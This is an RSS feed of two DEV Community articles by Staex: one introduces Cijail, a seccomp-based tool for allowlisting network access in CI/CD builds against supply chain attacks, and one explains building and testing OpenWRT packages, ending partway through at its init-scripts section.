<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Staex</title>
    <description>The latest articles on DEV Community by Staex (@staex).</description>
    <link>https://dev.to/staex</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/staex"/>
    <language>en</language>
    <item>
      <title>Cijail: How to protect your CI/CD pipelines from supply chain attacks?</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Wed, 05 Jun 2024 11:00:00 +0000</pubDate>
      <link>https://dev.to/staex/cijail-how-to-protect-your-cicd-pipelines-from-supply-chain-attacks-21fn</link>
      <guid>https://dev.to/staex/cijail-how-to-protect-your-cicd-pipelines-from-supply-chain-attacks-21fn</guid>
      <description>&lt;p&gt;Supply chain attacks are especially popular nowadays, and there is a good reason for that. Many build tools such as Cargo, Pip, NPM were not designed to protect from them (&lt;a href="https://wildwolf.name/secure-way-run-npm-ci/"&gt;NPM example&lt;/a&gt;, &lt;a href="https://internals.rust-lang.org/t/about-supply-chain-attacks/14038"&gt;Cargo-related discussion&lt;/a&gt;). At the same time maintainers' tools such as Nix, Guix, RPM and DEB build systems successfully mitigate such attacks. These tools precisely control what files are downloaded over the network before the build starts and prohibit any network access during the build phase itself. In this article we introduce a tool called &lt;a href="https://github.com/staex-io/cijail"&gt;Cijail&lt;/a&gt; that allows you to adopt similar rules for developers' build systems such as Cargo, Pip, NPM. This tool is based on Linux &lt;a href="https://man7.org/linux/man-pages/man2/seccomp.2.html"&gt;Seccomp&lt;/a&gt;, can be run inside CI/CD pipelines, and does not require superuser privileges. It protects from data exfiltration over DNS via deep packet inspection effectively limiting the damage supply chain attacks can cause. The tool is open source and written in Rust.&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Why protect from supply chain attacks?&lt;/li&gt;
&lt;li&gt;What is a supply chain attack?&lt;/li&gt;
&lt;li&gt;How the data is exfiltrated over DNS?&lt;/li&gt;
&lt;li&gt;
How we can protect ourselves from supply chain attacks?

&lt;ul&gt;
&lt;li&gt;Example: Cargo + Github (Cijail itself)&lt;/li&gt;
&lt;li&gt;Example: NPM + Gitlab (static web site)&lt;/li&gt;
&lt;li&gt;Caveat: cargo-deny via HTTPS proxy&lt;/li&gt;
&lt;li&gt;Caveat: NPM via HTTPS proxy&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Why protect from supply chain attacks?
&lt;/h2&gt;

&lt;p&gt;Supply chain attacks are become popular with introduction of developers' tools that manage project's dependencies. In contrast to maintainers' tools they do not block network access during build phase, and hackers use this seemingly minor breach to exfiltrate secrets by bundling malicious scripts with the dependency and executing these scripts during build phase. It takes only one popular dependency to be compromised to run these scripts on a multitude of developers' computers and CI/CD pipelines and steal private keys. This is unlikely event but the damage it may cause is catastrophic: private keys might give access to a cryptowallet (on a developer's machine), to a server via SSH, to a static website via cloud upload endpoint etc. From our perspective protecting from them by default is like using the seat belt: no one expects a car crash when one uses a seat belt, but expects the belt to save one's life in an unlikely catastrophic situation.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;What is a supply chain attack?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2cpgxlek096m88dd7o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2cpgxlek096m88dd7o.png" alt="The anatomy of a supply chain attack." width="640" height="245"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Supply chain attack starts with hacker getting access to a repository of a popular software package. The hacker can use social engineering, zero-day vulnerabilities in operating systems or breaches in repository management system itself. Usually two-factor authentication can protect from the attack on this phase.&lt;/p&gt;

&lt;p&gt;If the hacker was able to get access to the repository, he or she proceeds with making a malicious commit or (most likely) making a new release archive that contains malicious code. Usually signed commits and signed releases/packages/archives protect from the attack on this phase.&lt;/p&gt;

&lt;p&gt;Then the attacker waits until dependent software packages download new release of the breached dependency and execute the malicious code in their CI/CD pipelines or on the developers' computers. In order to exfiltrate the secrets the hacker would obscure the traffic as DNS for example and setup a DNS server to collect the secrets.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How the data is exfiltrated over DNS?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bn3hgqo6fe52yr8dl40.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bn3hgqo6fe52yr8dl40.png" alt="Data exfiltration over DNS." width="800" height="531"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Data exfiltration over DNS works as follows. A malicious actors sets up a DNS server for his/her domain. Then it encodes secrets as subdomains of this domain and eventually the DNS lookup request reaches the hacker's DNS server via other perfectly secure and legit publicly available DNS servers. This exfiltration uses DNS as a side channel. This is one of many side channels that hackers might use (the other popular one being ICMP protocol).&lt;/p&gt;

&lt;p&gt;Conveniently DNS traffic is not blocked anywhere because other software uses DNS. One way to protect from this attack is to either allow to resolve only certain domains via deep packet inspection or block Internet access altogether. Maintainers' tools use the latter while Cijail adopts the former approach because developers' tools were not designed to block the traffic during build phase.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How we can protect ourselves from supply chain attacks?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lww05myu0cb7coddlu1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lww05myu0cb7coddlu1.png" alt="Cijail architecture." width="640" height="173"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Cijail protects from supply chain attacks via whitelisting domain names, IP addresses and ports as well as URLS that a script is allowed to access. This is implemented using Seccomp and MITM HTTPS proxy server. Cijail launches the supplied command in a child process with Seccomp jail and &lt;code&gt;SECCOMP_RET_USER_NOTIF&lt;/code&gt; flag. Simultaneously the control process is launched that receives notifications from the jailed process and decides if the resource can be accessed via &lt;code&gt;SECCOMP_IOCTL_NOTIF_SEND&lt;/code&gt; flag. Finally, a MITM HTTPS proxy is launched as the third process. This process decrypts all HTTPS requests to check that the corresponding URL is allowed. For MITM HTTPS proxy to work the CA SSL certificate is automatically installed in the operating system as trusted.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# no traffic is allowed&lt;/span&gt;
🌊 cijail dig staex.io @1.1.1.1
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: deny connect 1.1.1.1:53

&lt;span class="c"&gt;# DNS request (connection to DNS server is allowed whereas name resolution is not)&lt;/span&gt;
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'1.1.1.1:53'&lt;/span&gt; cijail dig staex.io @1.1.1.1
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: allow connect 1.1.1.1:53
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: deny sendmmsg staex.io

&lt;span class="c"&gt;# DNS request and name resolution is allowed&lt;/span&gt;
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'1.1.1.1:53 staex.io'&lt;/span&gt; cijail dig staex.io @1.1.1.1
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: allow connect 1.1.1.1:53
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: allow sendmmsg staex.io
... dig output ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Example: Cargo + Github (Cijail itself)
&lt;/h3&gt;

&lt;p&gt;We tried to use Cijail for building itself. In order to use Cijail in your Github Actions you need to add the following line to your Dockerfile.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; --from=ghcr.io/staex-io/cijail:0.6.8 / /usr/local&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then you have to prepend cijail to every command in every step because Github Actions do not respect Docker's &lt;code&gt;ENTRYPOINT&lt;/code&gt;. Then all you need to do is to add &lt;code&gt;CIJAIL_ENDPOINTS&lt;/code&gt; environment variable with the list of allowed URLS and other endpoints. The resulting workflow specification for Cijail looks like the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;variables&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;https://github.com/lyz-code/yamlfix/                          # git&lt;/span&gt;
    &lt;span class="s"&gt;https://pypi.org/simple/                                      # pip&lt;/span&gt;
    &lt;span class="s"&gt;https://files.pythonhosted.org/packages/                      # pip&lt;/span&gt;
    &lt;span class="s"&gt;https://static.crates.io/crates/                              # cargo&lt;/span&gt;
    &lt;span class="s"&gt;https://index.crates.io/                                      # cargo&lt;/span&gt;
    &lt;span class="s"&gt;https://uploads.github.com/repos/staex-io/cijail/releases/    # github&lt;/span&gt;
    &lt;span class="s"&gt;https://api.github.com/repos/staex-io/cijail/releases         # github&lt;/span&gt;
&lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Lint&lt;/span&gt;
    &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cijail ./ci/build.sh&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Example: NPM + Gitlab (static web site)
&lt;/h3&gt;

&lt;p&gt;For Gitlab the approach is similar. This time you might consider adding &lt;code&gt;ENTRYPOINT ["/usr/local/bin/cijail"]&lt;/code&gt; to your &lt;code&gt;Dockerfile&lt;/code&gt; to not prepend &lt;code&gt;cijail&lt;/code&gt; to every command in your pipeline. The resulting workflow specification for a static web site looks like the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
  &lt;span class="s"&gt;https://registry.npmjs.org/                  # npm&lt;/span&gt;
  &lt;span class="s"&gt;https://github.com/lyz-code/yamlfix/         # git&lt;/span&gt;
  &lt;span class="s"&gt;https://pypi.org/simple/                     # pip&lt;/span&gt;
  &lt;span class="s"&gt;https://files.pythonhosted.org/packages/     # pip&lt;/span&gt;
  &lt;span class="s"&gt;9.9.9.9:53                                   # rsync&lt;/span&gt;
  &lt;span class="s"&gt;staex.io:22                                  # rsync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Caveat: cargo-deny via HTTPS proxy
&lt;/h3&gt;

&lt;p&gt;One particular problem that we encountered is the fact that some programs bundle trusted root CA certificates in their binaries. This is the case for cargo-deny. This tool uses webpki-roots crate that bundles root CA certificates as byte arrays directly in the cargo-deny binary. It is impossible to add Cijail's root certificate to such a program. The current workaround is to run cargo-deny without Cijail.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# our MITM proxy failed to trick cargo-deny :-(&lt;/span&gt;
🌊 cijail cargo deny check
&lt;span class="o"&gt;[&lt;/span&gt;ERROR] error trying to connect: invalid peer certificate: UnknownIssuer

&lt;span class="c"&gt;# a workaround&lt;/span&gt;
🌊 cijail cargo deny check &lt;span class="nt"&gt;--disable-fetch&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;    &lt;span class="c"&gt;# a warm-up (download dependencies)&lt;/span&gt;
🌊 cargo deny check                                   &lt;span class="c"&gt;# run without cijail 😮&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Caveat: NPM via HTTPS proxy
&lt;/h3&gt;

&lt;p&gt;Another problem comes from the fact that NPM usage behind HTTPS proxy is not as reliable as without it. In some cases it creates thousands of connections to download a few dependencies. The workaround that we found is to specify &lt;code&gt;maxsocket=1&lt;/code&gt; in NPM's configuration.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1000+ connections for 340 dependencies?&lt;/span&gt;
🌊 cijail npm &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;Fri May 24 07:02:13 2024] cijail: allow connect 127.0.0.1:39317
&lt;span class="o"&gt;[&lt;/span&gt;Fri May 24 07:02:13 2024] cijail: allow connect 127.0.0.1:39317
&lt;span class="o"&gt;[&lt;/span&gt;Fri May 24 07:02:13 2024] cijail: allow connect 127.0.0.1:39317
... the message repeats 1000+ &lt;span class="nb"&gt;times
&lt;/span&gt;npm ERR! code ECONNREFUSED

&lt;span class="c"&gt;# a workaround&lt;/span&gt;
🌊 npm config &lt;span class="nb"&gt;set &lt;/span&gt;maxsockets 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Conclusion
&lt;/h2&gt;

&lt;p&gt;To summarize, most CI/CD pipelines are vulnerable to data exfiltration via DNS because developers' tools like Cargo, NPM and PIP do not block network access during build phase in contrast to maintainers' tools like Nix, Guix, RPM and DEB build systems that do.&lt;/p&gt;

&lt;p&gt;The best way to protect from any data exfiltration is to split building the package into download and build phase. During download phase the dependencies are downloaded but no scripts are executed and no packages are built. During build phase the scripts are executed and the packages are built, but the network access is disabled. This simple technique will protect from any type of data exfiltration without the need for deep packet inspection.&lt;/p&gt;

&lt;p&gt;The major problem with implementing such a split in developers' tools is the fact that it might break some packages. Another problem is that blocking network access in a Docker container might require additional privileges that are not present by default. Below is the example of how to do this manually for NPM and Cargo.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# cargo example&lt;/span&gt;
🌊 cargo download    &lt;span class="c"&gt;# only download dependencies&lt;/span&gt;
🌊 unshare &lt;span class="nt"&gt;-rn&lt;/span&gt; cargo build    &lt;span class="c"&gt;# build packages and run scripts without network access (will not work in a Docker container)&lt;/span&gt;

&lt;span class="c"&gt;# npm example&lt;/span&gt;
🌊 npm clean-install &lt;span class="nt"&gt;--ignore-scripts&lt;/span&gt;    &lt;span class="c"&gt;# only download dependencies&lt;/span&gt;
🌊 unshare &lt;span class="nt"&gt;-rn&lt;/span&gt; npm rebuild    &lt;span class="c"&gt;# build packages and run scripts without network access (will not work in a Docker container)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Discuss on &lt;a href="https://www.reddit.com/r/rust/comments/1d6zs8s/cargo_and_supply_chain_attacks/"&gt;Reddit&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://staex.io/docs/91ea2cf3/cijail-slides.pdf"&gt;Slides&lt;/a&gt; from &lt;a href="https://berline.rs/2024/05/30/rust-and-tell.html"&gt;Rust &amp;amp; Tell: It is not June yet&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/staex-io/cijail"&gt;Cijail git repo&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>linux</category>
      <category>rust</category>
      <category>javascript</category>
      <category>python</category>
    </item>
    <item>
      <title>How to build and test your OpenWRT packages with Docker</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 30 Jan 2024 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/how-to-build-and-test-your-openwrt-packages-with-docker-1bco</link>
      <guid>https://dev.to/staex/how-to-build-and-test-your-openwrt-packages-with-docker-1bco</guid>
      <description>&lt;p&gt;Building and testing software packages for OpenWRT is challenging because this Linux distribution often runs on the devices with exotic architecture and uses centralized configuration (&lt;a href="https://openwrt.org/docs/guide-user/base-system/uci"&gt;UCI&lt;/a&gt;) with which you often need to integrate your software. In this article we will use Docker and QEMU to test package installation on MIPS architecture and discuss what scripts and other files to include in the package to better integrate your software with UCI and OpenWRT itself.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Why OpenWRT?&lt;/li&gt;
&lt;li&gt;
How to build OpenWRT package?.

&lt;ul&gt;
&lt;li&gt;
Post-install scripts.&lt;/li&gt;
&lt;li&gt;
Post-delete scripts.&lt;/li&gt;
&lt;li&gt;
Pre-delete scripts.&lt;/li&gt;
&lt;li&gt;
Init scripts.&lt;/li&gt;
&lt;li&gt;
First-boot scripts.&lt;/li&gt;
&lt;li&gt;
Persist files across system upgrades.&lt;/li&gt;
&lt;li&gt;
Package contents.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
How to test OpenWRT package with Docker.

&lt;ul&gt;
&lt;li&gt;
Testing packages for host architecture.&lt;/li&gt;
&lt;li&gt;
Testing packages for non-host architecture.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Conclusion.&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Why OpenWRT?
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://openwrt.org/"&gt;OpenWRT&lt;/a&gt; is a popular Linux distribution for network routers that brings the power of Linux kernel to resource-constrained devices. Companies use it as a base for their own routers' firmware, regular people use it to replace vendor-provided firmware which is often closed-source and lack many features compared to open-source OpenWRT.&lt;/p&gt;

&lt;p&gt;Apart from OpenWRT there is FreeBSD-based &lt;a href="https://pfsense.org/"&gt;pfSense&lt;/a&gt;. This distribution supports only x86 (64 bit) architecture whereas OpenWRT supports x86, ARM and MIPS architectures. FreeBSD and Linux are completely different kernels, and you would need a whole different setup for building FreeBSD packages.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How to build OpenWRT package?
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faewic3k9b9yfp3uhg73b.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faewic3k9b9yfp3uhg73b.jpg" alt="Photo by Debby Hudson on Unsplash." width="640" height="424"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenWRT uses &lt;a href="https://openwrt.org/docs/guide-user/additional-software/opkg"&gt;opkg&lt;/a&gt; package manager that can install &lt;a href="https://en.wikipedia.org/wiki/Opkg"&gt;ipk/opk&lt;/a&gt; packages from online repositories and local file system, and to build your own package you need to use &lt;a href="https://git.yoctoproject.org/opkg-utils/"&gt;opkg-utils&lt;/a&gt;. Ipk/opk package format is similar to &lt;a href="https://en.wikipedia.org/wiki/Deb_(file_format)"&gt;deb&lt;/a&gt; but uses &lt;a href="https://man7.org/linux/man-pages/man1/tar.1.html"&gt;tar&lt;/a&gt; instead of &lt;a href="https://man7.org/linux/man-pages/man1/ar.1.html"&gt;ar&lt;/a&gt; to package files. The simplest way of building a package is to use &lt;code&gt;opkg-build&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Flag `-c` replaces `ar` with `tar`. This is mandatory for OpenWRT.&lt;/span&gt;
🌊 opkg-build &lt;span class="nt"&gt;-c&lt;/span&gt; input-dir output-dir
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;input-dir&lt;/code&gt; contains the files that you want to install plus &lt;code&gt;CONTROL&lt;/code&gt; directory with metadata (for &lt;em&gt;deb&lt;/em&gt; format this directory is called &lt;code&gt;DEBIAN&lt;/code&gt; and you can use this name with &lt;code&gt;opkg-build&lt;/code&gt; as well). We don't know other major differences between deb and &lt;em&gt;ipk/opk&lt;/em&gt;. For this reason we ended up converting to &lt;em&gt;ipk&lt;/em&gt; from &lt;em&gt;deb&lt;/em&gt; that was generated by &lt;a href="https://fpm.readthedocs.io/"&gt;fpm&lt;/a&gt; — a tool that we use to produce packages for other Linux distributions. However, the contents of pre/post install/update/remove scripts is different for OpenWRT and there are other special files that you might want to include in the package.&lt;/p&gt;

&lt;p&gt;The package includes scripts that are run prior to or after the installation, update and removal of the package. Often package maintainers include them to start/stop services and update firewall rules.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Post-install scripts
&lt;/h2&gt;

&lt;p&gt;Setting up firewall rules in packages scripts is not typical of Linux distributions other than OpenWRT. This is due to the fact that OpenWRT uses &lt;a href="https://openwrt.org/docs/guide-user/base-system/uci"&gt;Unified Configuration Interface (UCI)&lt;/a&gt; — a centralized way of managing system configuration. Through UCI you can setup firewall rules that are inactive by default and can later be enabled via OpenWRT's &lt;a href="https://openwrt.org/docs/guide-user/luci/webinterface.overview"&gt;web interface&lt;/a&gt; or via command-line interface.&lt;/p&gt;

&lt;p&gt;The following commands set up firewall rule to accept TCP and UDP traffic on port 1234. The rule is disabled by default.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# post-install script&lt;/span&gt;
uci &lt;span class="nt"&gt;-q&lt;/span&gt; batch &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;/dev/null &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
add firewall rule
set firewall.@rule[-1].dest_port='1234'
set firewall.@rule[-1].src='*'
set firewall.@rule[-1].name='Allow-MyApp-any'
set firewall.@rule[-1].proto='udp tcp'
set firewall.@rule[-1].target='ACCEPT'
set firewall.@rule[-1].enabled='0'
commit firewall
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Usually you run each line as a separate &lt;em&gt;uci&lt;/em&gt; command (e.g. &lt;code&gt;uci add firewall rule&lt;/code&gt;), but &lt;code&gt;uci batch&lt;/code&gt; is generally faster for a large number of lines. It is up to you to enable or disable the rule by default: for public-facing services (e.g. VPNs) it is generally safe to open the port by default, for everything else (e.g. DNS resolver like Stubby) I would rather close the port by default.&lt;/p&gt;

&lt;p&gt;Later the rule can be enabled with the following commands.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# NNN is the actual index of the rule&lt;/span&gt;
uci &lt;span class="nb"&gt;set &lt;/span&gt;firewall.@rule[NNN].enabled&lt;span class="o"&gt;=&lt;/span&gt;1
uci commit firewall
fw3 reload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Post-delete scripts
&lt;/h2&gt;

&lt;p&gt;Deleting the rules is more involved as you need to find the rule index and delete all the matching lines. To distinguish between the package update and package deleting you need to check the first argument of the script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# post-delete script&lt;/span&gt;

delete_rule&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;
    config_get name &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; name
    &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="nb"&gt;test&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$name&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Allow-MyApp-any"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
        &lt;/span&gt;uci &lt;span class="nt"&gt;-q&lt;/span&gt; delete firewall.&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true
    &lt;/span&gt;&lt;span class="k"&gt;fi&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="k"&gt;in
&lt;/span&gt;0 &lt;span class="p"&gt;|&lt;/span&gt; remove&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nb"&gt;.&lt;/span&gt; /lib/functions.sh
    config_load firewall
    config_foreach delete_rule rule
    uci &lt;span class="nt"&gt;-q&lt;/span&gt; delete firewall.mcc &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;
    &lt;span class="p"&gt;;;&lt;/span&gt;
&lt;span class="k"&gt;esac&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Pre-delete scripts
&lt;/h2&gt;

&lt;p&gt;This is the right place to stop your services before deleting the package. Again to distinguish between the package update and package deleting you need to check the first argument of the script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/sh&lt;/span&gt;
&lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="k"&gt;in
&lt;/span&gt;0 &lt;span class="p"&gt;|&lt;/span&gt; remove&lt;span class="p"&gt;)&lt;/span&gt;
    /etc/init.d/myapp stop &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;
    &lt;span class="p"&gt;;;&lt;/span&gt;
&lt;span class="k"&gt;esac&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Init scripts
&lt;/h2&gt;

